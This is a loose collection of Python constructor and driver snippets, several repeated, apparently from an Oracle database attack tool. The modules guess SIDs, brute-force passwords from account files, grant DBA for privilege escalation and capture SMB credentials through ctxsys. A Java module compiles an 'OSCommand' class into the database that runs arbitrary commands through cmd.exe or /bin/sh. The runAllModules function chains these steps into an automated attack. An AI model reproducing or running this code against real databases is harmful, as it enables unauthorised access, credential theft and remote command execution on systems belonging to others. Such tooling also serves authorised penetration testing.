def __init__(self, args): ''' Constructor ''' logging.debug("DbmSscheduler object created") OracleDatabase.__init__(self, args) self.jobName = None
def __init__(self, args): ''' Constructor ''' logging.debug("CVE_XXXX_YYYY object created") OracleDatabase.__init__(self,args) self.args=args
def __init__(self,args): ''' Constructor ''' logging.debug("DbmSscheduler object created") OracleDatabase.__init__(self,args) self.jobName = None
def __init__(self, args): ''' Constructor ''' logging.debug("Passwords object created") OracleDatabase.__init__(self, args) self.passwords = []
def __init__(self,args): ''' Constructor ''' logging.debug("Passwords object created") OracleDatabase.__init__(self,args) self.passwords = []
def __init__(self, args): ''' Constructor ''' logging.debug("CVE_XXXX_YYYY object created") OracleDatabase.__init__(self, args) self.args = args
def __init__(self, args): ''' Constructor ''' logging.debug("UsernameLikePassword object created") OracleDatabase.__init__(self, args) self.allUsernames = [] self.validAccountsList = []
def __init__(self,args): ''' Constructor ''' logging.debug("Info object created") OracleDatabase.__init__(self,args) self.version = '' self.os = ''
def __init__(self,args): ''' Constructor ''' logging.debug("PrivilegeEscalation object created") OracleDatabase.__init__(self,args) #Ccommon self.GRANT_DBA_TO_USER = "******"#{0} User
def __init__(self,args): ''' Constructor ''' logging.debug("UsernameLikePassword object created") OracleDatabase.__init__(self,args) self.allUsernames = [] self.validAccountsList = []
def __init__(self, args): ''' Constructor ''' logging.debug("Info object created") OracleDatabase.__init__(self, args) self.version = '' self.os = ''
def __init__(self, args): """ Constructor """ logging.debug("Ctxsys object created") OracleDatabase.__init__(self, args) self.tableName = self.__generateRandomString__() self.indexName = self.__generateRandomString__()
def __init__(self, args): ''' Constructor ''' logging.debug("Ctxsys object created") OracleDatabase.__init__(self, args) self.tableName = self.__generateRandomString__() self.indexName = self.__generateRandomString__()
def __init__(self, args): ''' Constructor ''' logging.debug("DirectoryManagement object created") OracleDatabase.__init__(self, args) self.PREFIX = "ODATPREFIX" #self.__dropAllOldDirectories__() self.__setDirectoryName__()
def __init__(self,args): ''' Constructor ''' logging.debug("DirectoryManagement object created") OracleDatabase.__init__(self,args) self.PREFIX = "ODATPREFIX" #self.__dropAllOldDirectories__() self.__setDirectoryName__()
def __init__(self,args, offline): ''' Constructor ''' logging.debug("Unwrapper object created") self.offline = offline if offline == False: logging.debug("Offline mode of Unwrapper module enabled.") OracleDatabase.__init__(self,args) else: logging.debug("Offline mode of Unwrapper module disabled")
def __init__(self, args, offline): ''' Constructor ''' logging.debug("Unwrapper object created") self.offline = offline if offline == False: logging.debug("Offline mode of Unwrapper module enabled.") OracleDatabase.__init__(self, args) else: logging.debug("Offline mode of Unwrapper module disabled")
def __init__(self,args,accountsFile,timeSleep=0): ''' Constructor ''' OracleDatabase.__init__(self,args) self.accountsFile = accountsFile if self.accountsFile == '' : self.accounts = [] else : self.accounts = self.__getAccounts__() self.valideAccounts = {} self.args['SYSDBA'] = False self.args['SYSOPER'] = False self.timeSleep = timeSleep
def __init__(self, args): """ Constructor """ logging.debug("Http object created") OracleDatabase.__init__(self, args) self.ERROR_NO_HTTP = "ORA-29263: " self.ERROR_PROTOCOL = "ORA-29259: " self.ERROR_NO_OPEN = "ORA-12541: " self.ERROR_TIMEOUT = "ORA-12535: " self.ERROR_TRANSF_TIMEOUT = "ORA-29276: " self.ERROR_UTL_TCP_NETWORK = "ORA-29260: "
def __init__(self, args): ''' Constructor ''' logging.debug("Http object created") OracleDatabase.__init__(self, args) self.ERROR_NO_HTTP = "ORA-29263: HTTP protocol error" self.ERROR_PROTOCOL = "ORA-29259: end-of-input reached" self.ERROR_NO_OPEN = "ORA-12541: TNS:no listener" self.ERROR_TIMEOUT = "ORA-12535: TNS:operation timed out" self.ERROR_TRANSF_TIMEOUT = "ORA-29276: transfer timeout" self.ERROR_UTL_TCP_NETWORK = "ORA-29260: network error"
def __init__(self,args): ''' Constructor ''' logging.debug("Http object created") OracleDatabase.__init__(self,args) self.ERROR_NO_HTTP = "ORA-29263: HTTP protocol error" self.ERROR_PROTOCOL = "ORA-29259: end-of-input reached" self.ERROR_NO_OPEN = "ORA-12541: TNS:no listener" self.ERROR_TIMEOUT = "ORA-12535: TNS:operation timed out" self.ERROR_TRANSF_TIMEOUT = "ORA-29276: transfer timeout" self.ERROR_UTL_TCP_NETWORK = "ORA-29260: network error"
def __init__(self,args): ''' Constructor ''' logging.debug("Http object created") OracleDatabase.__init__(self,args) self.ERROR_NO_HTTP = "ORA-29263: " self.ERROR_PROTOCOL = "ORA-29259: " self.ERROR_NO_OPEN = "ORA-12541: " self.ERROR_TIMEOUT = "ORA-12535: " self.ERROR_TRANSF_TIMEOUT = "ORA-29276: " self.ERROR_UTL_TCP_NETWORK = "ORA-29260: "
def loginUser(self): login = self.userNameLineEdit password = self.passwordLineEdit if self.connTypeComboBox.currentIndex() == 0: print("Connect to database") try: OD = OracleDatabase() OD.get_connection() except: traceback.print_exc() print("Connection Error!")
def __init__(self, args, SIDFile, timeSleep=0): ''' Constructor ''' logging.debug("SIDGuesser object created") OracleDatabase.__init__(self,args) self.SIDFile = SIDFile self.sids = [] self.valideSIDS = [] self.args['SYSDBA'] = False self.args['SYSOPER'] = False self.timeSleep = timeSleep self.NO_GOOD_SID_STRING_LIST = ["listener does not currently know of service requested","connection to server failed"]
def __init__(self, args, SIDFile, timeSleep=0): ''' Constructor ''' logging.debug("SIDGuesser object created") OracleDatabase.__init__(self,args) self.SIDFile = SIDFile self.sids = [] self.valideSIDS = [] self.args['SYSDBA'] = False self.args['SYSOPER'] = False self.timeSleep = timeSleep self.NO_GOOD_SID_STRING_LIST = ["listener does not currently know of service requested","listener does not currently know of SID","connection to server failed"]
def __init__(self,args,accountsFile,loginFile,passwordFile,loginAsPwd,timeSleep=0): ''' Constructor ''' OracleDatabase.__init__(self,args) self.accountsFile = accountsFile self.loginFile = loginFile self.passwordFile = passwordFile self.loginAsPwd = loginAsPwd if self.accountsFile == '' : self.accounts = [] else : self.accounts = self.__getAccounts__() self.valideAccounts = {} self.args['SYSDBA'] = False self.args['SYSOPER'] = False self.timeSleep = timeSleep
def __init__(self,args): ''' Constructor ''' logging.debug("SMB object created") OracleDatabase.__init__(self,args) self.localIp = "127.0.0.1" self.shareName = "SHARE" self.TABLE_NAME = "ODAT_SMB_table" self.SQL_CREATE_TABLE = "CREATE TABLE {0} (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6))" self.SQL_DROP_TABLE = "DROP TABLE {0}" self.SQL_INSERTINTO = "INSERT INTO {0} VALUES (1, '\\\\{1}\\{2}', NULL)" self.INDEX_NAME = "ODAT_SMB_INDEX" self.SQL_CREATE_INDEX = "CREATE INDEX {0} ON {1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column ot_format')" self.SQL_DROP_INDEX = "DROP INDEX {0}" self.loadInformationRemoteDatabase()
def __init__(self, args): ''' Constructor ''' logging.debug("Java object created") OracleDatabase.__init__(self, args) self.SOURCE_OS_COMMAND_CLASS = """ CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "OSCommand" AS import java.io.*; public class OSCommand { public static String executeCommand(String command) { StringBuffer sb = new StringBuffer(); try { String[] finalCommand; if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) { String systemRootvariable; try {systemRootvariable = System.getenv("SystemRoot");} catch (ClassCastException e) { systemRootvariable = System.getProperty("SystemRoot"); } finalCommand = new String[4]; finalCommand[0] = systemRootvariable+"\\\system32\\\cmd.exe"; finalCommand[1] = "/y"; finalCommand[2] = "/c"; finalCommand[3] = command; } else { // Linux or Unix System finalCommand = new String[3]; finalCommand[0] = "/bin/sh"; finalCommand[1] = "-c"; finalCommand[2] = command; } // Execute the command... final Process pr = Runtime.getRuntime().exec(finalCommand); pr.waitFor(); // Capture output from STDOUT BufferedReader br_in = null; try { br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); String buff = null; while ((buff = br_in.readLine()) != null) { sb.append(buff); sb.append("\\n"); //try {Thread.sleep(100);} catch(Exception e) {} } br_in.close(); } catch (IOException ioe) { sb.append("IOException in input stream: ").append(ioe.getMessage()); System.out.println("Error printing process output."); ioe.printStackTrace(); } finally { try { br_in.close(); } catch (Exception ex) {} } // Capture output from STDERR BufferedReader br_err = null; try { br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); String buff = null; while ((buff = br_err.readLine()) != null) { sb.append("stderr:"); sb.append(buff); sb.append("\\n"); //try {Thread.sleep(100);} catch(Exception e) {} } br_err.close(); } catch (IOException ioe) { sb.append("IOException in error stream: ").append(ioe.getMessage()); System.out.println("Error printing execution errors."); ioe.printStackTrace(); } finally { try { br_err.close(); } catch (Exception ex) {} } } catch (Exception ex) { sb.append("Exception: ").append(ex.getMessage()); System.out.println(ex.getLocalizedMessage()); } return sb.toString(); } };""" self.SOURCE_OS_COMMAND_CREATE_FUNCTION = "CREATE OR REPLACE FUNCTION oscmd (p_command IN VARCHAR2) RETURN VARCHAR2 AS LANGUAGE JAVA NAME 'OSCommand.executeCommand (java.lang.String) return java.lang.String';" self.SOURCE_OS_COMMAND_EXEC = "select oscmd('{0}') from dual" self.SOURCE_DROP_CLASS = "DROP JAVA SOURCE \"OSCommand\"" self.SOURCE_DROP_FUNCTION = "DROP FUNCTION oscmd" self.LINUX_CMD_ERROR = 'No such file or directory' self.JAVA_SESSION_CLEARED = "Java session state cleared"
def __init__(self, args): ''' Constructor ''' logging.debug("SMB object created") OracleDatabase.__init__(self, args)
def __init__(self,args): ''' Constructor ''' logging.debug("Search object created") OracleDatabase.__init__(self,args)
def runAllModules(args): ''' Run all modules ''' connectionInformation, validSIDsList = {}, [] #0)TNS Poinsoning if args['no-tns-poisoning-check'] == False: tnspoison = Tnspoison(args) tnspoison.testAll() else: logging.info("Don't check if the target is vulnerable to TNS poisoning because the option --no-tns-poisoning-check is enabled in command line") #A)SID MANAGEMENT if args['sid'] == None : logging.debug("Searching valid SIDs") validSIDsList = runSIDGuesserModule(args) args['user'], args['password'] = None, None else : validSIDsList = [args['sid']] if validSIDsList == []: exit(EXIT_NO_SIDS) #B)ACCOUNT MANAGEMENT if args['credentialsFile'] == True : logging.debug("Loading credentials stored in the {0} file".format(args['accounts-file'])) #Load accounts from file passwordGuesser = PasswordGuesser(args, args['accounts-file'], loginFile=None ,passwordFile=None, loginAsPwd=args['login-as-pwd']) validAccountsList = passwordGuesser.getAccountsFromFile() for aSid in validSIDsList: for anAccount in validAccountsList: if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[anAccount[0], anAccount[1]]] else : connectionInformation[aSid].append([anAccount[0], anAccount[1]]) elif args['user'] == None and args['password'] == None: for sid in validSIDsList: args['print'].title("Searching valid accounts on the {0} SID".format(sid)) args['sid'] = sid if args['accounts-files'][0] != None and args['accounts-files'][1] != None : args['accounts-file'] = None passwordGuesser = PasswordGuesser(args, accountsFile=args['accounts-file'], loginFile=args['accounts-files'][0], passwordFile=args['accounts-files'][1], timeSleep=args['timeSleep'], loginAsPwd=args['login-as-pwd']) passwordGuesser.searchValideAccounts() validAccountsList = passwordGuesser.valideAccounts if validAccountsList == {}: args['print'].badNews("No found a valid account on {0}:{1}/{2}. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-file accounts/logins.txt accounts/pwds.txt'".format(args['server'], args['port'], args['sid'])) exit(EXIT_NO_ACCOUNTS) else : args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'],getCredentialsFormated(validAccountsList))) for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(sid) == False: connectionInformation[sid] = [[aLogin,aPassword]] else : connectionInformation[sid].append([aLogin,aPassword]) else: validAccountsList = {args['user']:args['password']} for aSid in validSIDsList: for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[aLogin,aPassword]] else : connectionInformation[aSid].append([aLogin,aPassword]) #C)ALL OTHERS MODULES if sidHasBeenGiven(args) == False : return EXIT_MISS_ARGUMENT #elif anAccountIsGiven(args) == False : return EXIT_MISS_ARGUMENT for aSid in connectionInformation.keys(): for loginAndPass in connectionInformation[aSid]: args['sid'] , args['user'], args['password'] = aSid, loginAndPass[0],loginAndPass[1] args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'],args['user'],args['password'])) #INFO ABOUT REMOTE SERVER status = OracleDatabase(args).connection() if isinstance(status,Exception): args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n',''))) break #UTL_HTTP utlHttp = UtlHttp(args) status = utlHttp.connection() utlHttp.testAll() #HTTPURITYPE httpUriType = HttpUriType(args) httpUriType.testAll() #UTL_FILE utlFile = UtlFile(args) utlFile.testAll() #JAVA java = Java(args) java.testAll() #DBMS ADVISOR dbmsAdvisor = DbmsAdvisor(args) dbmsAdvisor.testAll() #DBMS Scheduler dbmsScheduler = DbmsScheduler(args) dbmsScheduler.testAll() #CTXSYS ctxsys = Ctxsys(args) ctxsys.testAll() #Passwords passwords = Passwords(args) passwords.testAll() #DbmsXmldom dbmsXslprocessor = DbmsXslprocessor(args) dbmsXslprocessor.testAll() #External Table externalTable = ExternalTable(args) externalTable.testAll() #Oradbg oradbg = Oradbg(args) oradbg.testAll() #DbmsLob dbmsLob = DbmsLob(args) dbmsLob.testAll() #SMB smb = SMB(args) smb.testAll() #Pribvilege escalation privilegeEscalation = PrivilegeEscalation(args) privilegeEscalation.testAll() #Test some CVE cve = CVE_XXXX_YYYY(args) cve.testAll() cve.close() #Close the socket to the remote database #CVE_2012_3137 cve = CVE_2012_3137 (args) cve.testAll() #usernamelikepassword args['run'] = True runUsernameLikePassword(args)
def __init__(self,args): ''' Constructor ''' logging.debug("Java object created") OracleDatabase.__init__(self,args) self.SOURCE_OS_COMMAND_CLASS = """ CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "OSCommand" AS import java.io.*; public class OSCommand { public static String executeCommand(String command) { StringBuffer sb = new StringBuffer(); try { String[] finalCommand; if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) { String systemRootvariable; try {systemRootvariable = System.getenv("SystemRoot");} catch (ClassCastException e) { systemRootvariable = System.getProperty("SystemRoot"); } finalCommand = new String[4]; finalCommand[0] = systemRootvariable+"\\\system32\\\cmd.exe"; finalCommand[1] = "/y"; finalCommand[2] = "/c"; finalCommand[3] = command; } else { // Linux or Unix System finalCommand = new String[3]; finalCommand[0] = "/bin/sh"; finalCommand[1] = "-c"; finalCommand[2] = command; } // Execute the command... final Process pr = Runtime.getRuntime().exec(finalCommand); // Capture output from STDOUT BufferedReader br_in = null; try { br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); String buff = null; while ((buff = br_in.readLine()) != null) { sb.append(buff); sb.append("\\n"); try {Thread.sleep(100);} catch(Exception e) {} } br_in.close(); } catch (IOException ioe) { System.out.println("Error printing process output."); ioe.printStackTrace(); } finally { try { br_in.close(); } catch (Exception ex) {} } // Capture output from STDERR BufferedReader br_err = null; try { br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); String buff = null; while ((buff = br_err.readLine()) != null) { sb.append("stderr:"); sb.append(buff); sb.append("\\n"); try {Thread.sleep(100);} catch(Exception e) {} } br_err.close(); } catch (IOException ioe) { System.out.println("Error printing execution errors."); ioe.printStackTrace(); } finally { try { br_err.close(); } catch (Exception ex) {} } } catch (Exception ex) { System.out.println(ex.getLocalizedMessage()); } return sb.toString(); } };""" self.SOURCE_OS_COMMAND_CREATE_FUNCTION = "CREATE OR REPLACE FUNCTION oscmd (p_command IN VARCHAR2) RETURN VARCHAR2 AS LANGUAGE JAVA NAME 'OSCommand.executeCommand (java.lang.String) return java.lang.String';" self.SOURCE_OS_COMMAND_EXEC = "select oscmd('{0}') from dual" self.SOURCE_DROP_CLASS = "DROP JAVA SOURCE \"OSCommand\"" self.SOURCE_DROP_FUNCTION = "DROP FUNCTION oscmd" self.LINUX_CMD_ERROR = 'No such file or directory' self.JAVA_SESSION_CLEARED = "Java session state cleared"